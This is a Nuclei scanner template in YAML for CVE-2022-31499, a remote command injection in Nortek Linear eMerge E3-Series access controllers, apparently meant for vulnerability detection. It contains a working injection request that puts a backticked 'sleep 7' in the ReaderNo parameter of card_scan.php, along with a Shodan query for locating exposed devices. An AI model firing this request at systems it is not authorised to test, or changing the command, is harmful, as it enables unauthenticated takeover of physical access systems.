43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2022-31499
|
|
|
|
info:
|
|
name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: |
|
|
Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
|
|
- https://github.com/omarhashem123/CVE-2022-31499
|
|
- http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31499
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-31499
|
|
cwe-id: CWE-78
|
|
epss-score: 0.03969
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"eMerge"
|
|
verified: true
|
|
tags: packetstorm,cve,cve2022,emerge,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- duration>=7
|
|
- contains(all_headers, "text/html")
|
|
- status_code == 200
|
|
- contains(body, '{\"CardNo\":false')
|
|
condition: and
|
|
|
|
# Enhanced by md on 2023/03/21
|